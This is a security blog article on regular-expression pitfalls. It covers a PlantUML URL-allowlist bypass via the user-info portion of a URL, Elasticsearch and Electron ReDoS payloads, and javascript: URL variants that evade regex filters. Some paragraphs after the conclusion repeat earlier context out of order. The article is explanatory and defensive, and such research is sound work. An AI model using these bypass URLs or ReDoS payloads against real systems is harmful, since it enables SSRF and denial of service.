Regular Expressions Are Hard

How to avoid common pitfalls.


Last updated 1 year ago


From insufficient security fixes to ReDoS, regular expressions are hard to get right. Yet, they are integral to modern software security and development. Hopefully this article helps you avoid common pitfalls before it's too late!

A Tale of Flawed Regex (CVE-2023-3432)

Let's begin with a story of how an innocent regex change led to a security vulnerability.

A few months ago, I was looking into a particular rich text editor when I noticed that it supported an interesting integration — PlantUML. This project allows users to write UML as code, and have a web server turn that code into a graphical UML diagram.

What immediately caught my eye was how utterly complex the project was, given its seemingly simple use case. The more complex any software is, the more difficult it is to ensure its security. Going over to the Preprocessing page of the PlantUML documentation reveals a treasure trove of built-in functions with interesting security implications.

Additionally, the %load_json function allows fetching from a URL, so SSRF was also present.

Great, so only PlantUML instances running on the default security profile were vulnerable, right? I wanted to see if I could break one of the higher-security modes, so I looked into the ALLOWLIST mode. With this profile, only allowlisted URLs can be reached, limiting the impact of SSRF.

This is Why We Can't Have Nice Things

private boolean isInUrlAllowList() {
  // Clean the URL, then accept it if it starts with any allowlisted prefix
  final String full = cleanPath(internal.toString());
  for (String allow : getUrlAllowList())
    if (full.startsWith(cleanPath(allow)))
      return true;

  return false;
}

However, PlantUML attempts to remove the user information portion of the URL before performing the startsWith check.

private static String removeUserInfoFromUrlPath(String url) {
  // Simple solution:
  final Matcher matcher = PATTERN_USERINFO.matcher(url);
  if (matcher.find())
    return matcher.replaceFirst("$1$3");

  return url;
}

This should have been a good thing, but the regular expression used ruined everything. Consider the following regex, which captures the user information in the second group and the actual host in the third group.

private static final Pattern PATTERN_USERINFO = Pattern.compile("(^https?://)([-_0-9a-zA-Z]+@)([^@]*)");

It assumes that the user information part always contains the characters [-_0-9a-zA-Z]+. So if we use https://plantuml.com@evil.com, there is no match! In fact, the regex fails to perform its intended function since the format for user information in URLs is <username>:<password>@<host> and the regex does not contain :.

So, back to basics — a simple https://allowlisted.url.com@evil.com bypass would allow us to reach any arbitrary URL.
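To make the flaw concrete, here is a minimal JavaScript re-creation of the flawed logic (a sketch: the function and pattern names mirror the Java originals, and the allowlisted URL is hypothetical):

```javascript
// Sketch of the flawed userinfo-stripping logic, ported to JavaScript.
// The character class lacks "." and ":", so real-world userinfo never matches.
const PATTERN_USERINFO = /(^https?:\/\/)([-_0-9a-zA-Z]+@)([^@]*)/;

function removeUserInfoFromUrlPath(url) {
  // Mirrors Java's matcher.find() followed by replaceFirst("$1$3")
  return PATTERN_USERINFO.test(url) ? url.replace(PATTERN_USERINFO, "$1$3") : url;
}

const bypass = "https://allowlisted.url.com@evil.com/";

// The "." in "allowlisted.url.com" defeats the regex, so nothing is stripped...
console.log(removeUserInfoFromUrlPath(bypass)); // "https://allowlisted.url.com@evil.com/"

// ...which means the prefix check happily passes...
console.log(removeUserInfoFromUrlPath(bypass).startsWith("https://allowlisted.url.com")); // true

// ...while the request actually resolves to the attacker's host.
console.log(new URL(bypass).hostname); // "evil.com"
```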

What Can We Learn From This?

Using the URL class's getHost method, one can get the hostname of the URL, ignoring other parts of the URL like user information. This hostname can then be matched against the allowlist — simple!

Don't make your life harder: regex-based allowlists and blocklists are hard to get right.
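As a sketch of that advice in JavaScript (the allowlisted host here is hypothetical), comparing parsed hostnames instead of raw string prefixes sidesteps the userinfo trick entirely:

```javascript
// Hostname-based allowlisting: parse first, then compare exact hostnames.
const ALLOWED_HOSTS = new Set(["allowlisted.url.com"]);

function isAllowed(rawUrl) {
  let host;
  try {
    host = new URL(rawUrl).hostname; // userinfo, port, and path are ignored
  } catch {
    return false; // unparseable input is rejected outright
  }
  return ALLOWED_HOSTS.has(host);
}

console.log(isAllowed("https://allowlisted.url.com/diagram.puml")); // true
console.log(isAllowed("https://allowlisted.url.com@evil.com/"));    // false, host is evil.com
```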

When ReDoS Should Not Be Out of Scope: Bringing Down Your Elasticsearch Cluster

Bug bounty programs often classify Denial of Service (DoS) issues as out of scope. This is even more likely for ReDoS issues, a specific subclass of DoS that exploits the fact that most regex engines can be pushed into pathological cases where matching becomes extremely slow.

This is due to a regex engine feature called backtracking, an algorithmic technique that brute-forces every combination in order to solve a problem. When a "dead end" is encountered, the algorithm retraces its steps to previous decision points and explores the remaining unvisited branches.

In the context of regular expressions, these dead ends are simply non-matches. Take the regex ^(a+)+$. A non-match would be aaaaX. Because of the nested quantifiers, the amount of backtracking grows exponentially with the number of as. This is called catastrophic backtracking.
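One way to see the blow-up is to time the engine on near-miss inputs of increasing length. A small Node.js sketch (exact timings will vary by machine and engine):

```javascript
// Each extra "a" roughly doubles the work for /^(a+)+$/ on a non-matching input.
const pattern = /^(a+)+$/;

for (const n of [18, 20, 22]) {
  const input = "a".repeat(n) + "X"; // guaranteed non-match
  const start = process.hrtime.bigint();
  pattern.test(input);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  console.log(`n=${n}: ${elapsedMs.toFixed(1)} ms`);
}
```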

In a bug bounty program a while back, I found an exposed Elasticsearch API that allowed me to run any query on the Elasticsearch instance. The Elasticsearch data wasn't particularly sensitive, so I had to find another way to escalate the impact.

A developer mentioned that "it is possible for a sufficiently determined malicious user to write searches that overwhelm the Elasticsearch cluster and bring it down". Huh.

Scripting Module to ReDoS

{
   "aggs":{
      "ContentType":{
         "terms":{
            "field":"ContentType",
            "size":25
         }
      }
   },
   "query":{
      "bool":{
         "must":[
            {
               "script":{
                  "script":{
                     "source":"params.x =~ /a{0,7}{0,10}$/",
                     "params":{
                        "x":"aaaaaaa"
                     }
                  }
               }
            }
         ]
      }
   },
   "highlight":{
      "fields":{
         "*":{
            
         }
      },
      "fragment_size":"350"
   }
}

In this script, the regex engine needs only 23 steps to find the match.

But when the last character in the test string is changed to an x, the string aaaaaax will cause the algorithm to take 74,380 steps instead.

Now, what if we used /((a{0,7}){0,7}){0,10}$/? Regex101 detects catastrophic backtracking and gives up.

In this particular program, the difference in computational complexity becomes very noticeable once we look at the took attribute of the response JSON.

I ended up reporting the following query, which caused the server to take more than a minute to respond. This was around a 3,000x amplification from the original query time of 20ms.

"source":"params.x =~ /a{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{
0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{
0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{
0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,7}{0,10}$/  ? false : false",
"params":{
   "x":"aaaaaax"
}

Clearly, we could continue adding more {0,7} to the regex to strengthen the payload until it crashes the Elasticsearch service. To respect the program rules against performing DoS attacks, I did not test any payloads stronger than this.

Attacker Leverage and My Philosophy on DoS

Alas, this adventure only served to fuel my ongoing gripe with the status quo of classifying all DoS issues as out of scope in bug bounty programs.

It's understandable that companies and organizations don't want people spamming their infrastructure to report DoS issues. But when you have an exponential amplification vector, it's dangerous to ignore.

The traditional CIA model names three problem areas, and Availability is one of them. What's important is leverage: how much leverage does the attacker have over your resources?

If an attacker can use a single HTTP request to bring your server to its knees, that's a very high-leverage DoS vector. On the other hand, if the attacker has to use significant resources, like a botnet, to stage a DDoS, then that's a very low-leverage DoS vector. I definitely agree that low-leverage DoS vectors should be out of scope!

I hope that more people adopt this view and become more accepting of DoS vulnerabilities in application security. In this particular case, it is definitely a high-leverage vulnerability that deserves attention. Unfortunately, the team will likely never fix it.

ReDoS in Single-Threaded Applications

Node.js is a single-threaded, event-driven JavaScript runtime. Simply put, everything happens on a single-threaded "event loop". When things happen (such as a new request), a callback is triggered. This fills up the event queue, which the event loop works to clear.

All of this is to say, if a regular expression is being tested in JavaScript, nothing else can happen until the test is complete. For example, if a Node.js web server is handling a request, and is using a regex to validate one of the request parameters, no other requests can go through until this is done.
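As a small sketch (the slow pattern and input are stand-ins for a hypothetical vulnerable parameter check), a single synchronous regex test delays every other queued callback:

```javascript
// The timer below is due "immediately", but the event loop cannot run it
// until the synchronous regex test releases the one and only thread.
const queuedAt = Date.now();

setTimeout(() => {
  console.log(`timer fired after ${Date.now() - queuedAt} ms`);
}, 0);

const evilParam = "a".repeat(24) + "X";
/^(a+)+$/.test(evilParam); // blocks the event loop for a noticeable while
```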

This has client-side implications as well: there is no way to push work off to a background thread to keep the UI responsive, so everything has to happen in the event loop.

^(?:(?:https)://)(?:\S+(?::\S*)?@)?(?:(?!(?:10|127)(?:\.\d{1,3}){3})(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2}) [...REDACTED...] |(?:(?:[a-z\u00a1-\uffff0-9]-*)*[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff0-9]-*)*[a-z\u00a1-\uffff0-9]+)*)(?::\d{2,5})?(?:[/?#]\S*)?$

This regex was tested every time the user clicked on a link, so sending the following link to a victim can cause their application to hang for several seconds.

("https://6" + "@:-".repeat(8075) + "\t")

Client-side DoS vectors like these are also hard to ignore — who doesn't remember the viral WhatsApp bug that crashed the app whenever someone sent an evil message?

Wrapping Up

Writing regular expressions is hard. On one hand, security-oriented regular expressions need to be able to catch all edge cases and potential bypasses. On the other, we need to avoid overly complex regular expressions that introduce ReDoS vectors.

On delicate attack surfaces like URL parsing, it's almost always better to go with existing parsers instead of trying to reinvent the wheel. For instance, JavaScript's URL class is WHATWG URL Standard compliant, which means that it parses URLs exactly how a standards-compliant browser would.

It is way better to prevent XSS, for example, by using new URL(dirty).protocol === 'javascript:' instead of trying to use a regular expression to catch javascript: URLs, simply because there are many ways to write the same URL. Your custom regex might catch javascript:alert(), but does it catch all of the following URLs? It might be hard to say.

  • JAVASCRIPT:alert()

  • \x00javascript:alert()

  • java\r\nscript:alert()

  • java\tscript:alert()

  • javascript\r\n:alert()
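For comparison, the WHATWG URL parser normalizes every one of those variants, since it lowercases the scheme and strips tabs, newlines, and leading control characters before parsing. A quick Node.js check:

```javascript
// All of these normalize to the same protocol under WHATWG URL parsing.
const suspects = [
  "JAVASCRIPT:alert()",     // scheme is lowercased
  "\x00javascript:alert()", // leading C0 controls are trimmed
  "java\r\nscript:alert()", // CR and LF are removed anywhere in the input
  "java\tscript:alert()",   // tabs are removed too
  "javascript\r\n:alert()",
];

for (const s of suspects) {
  console.log(new URL(s).protocol); // "javascript:" every time
}
```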

If regular expressions have to be used, it's often wise to avoid the following patterns to prevent ReDoS:

  • Nesting quantifiers, like (a+)+

  • Non-mutually exclusive alternations, like (.|a)*

  • Non-mutually exclusive quantifiers in sequence, like a.*?b.*?c

I hope that this has been an interesting read!

While most of the sensitive functions like %getenv were blocked in the default security profile of the web server, %load_json was not. This allowed us to read any local JSON file and confirm whether any file exists on the filesystem. This turned out to be an oversight (and was assigned CVE-2023-3431), since the !include and !theme directives (which also enable local file reading) were subject to the security profile checks.

Taking a closer look at where this check is performed, we see that each URL is first cleaned through cleanPath, then checked against the allowlist with startsWith.

Normally, using startsWith allows a trivial bypass using the user information part of a URL, which carries basic authentication credentials.

But how did this vulnerability come about? In attempting to fix a previous issue, the PATTERN_USERINFO regex was changed, introducing the limited set of characters that would match the user information part of the URL.

Regular expressions are hard to get right. But more importantly, don't reinvent the wheel! Java already comes with a URL class that has been tried and tested to perform standards-compliant URL parsing.

I found a post on the Elasticsearch forum which I thought was pretty interesting.

I couldn't find any online resources on how to do this, so I had to figure it out myself. Eventually, while exploring the Elasticsearch documentation, I found the scripting module. The scripts were well-sandboxed, and I couldn't find a way to escalate this into an RCE.

Thankfully, though, Painless scripts allow us to run regular expressions. The following would run a script that simply checks whether aaaaaaa fulfills the regex /a{0,7}{0,10}$/. As the server URL-encodes many characters, I was only able to work with the {...} quantifiers to increase the time complexity.

It gets even more interesting when modern desktop apps are built on frameworks like Electron that run on Node.js. Recently, I came across a very complex URL validation regex in an Electron app.
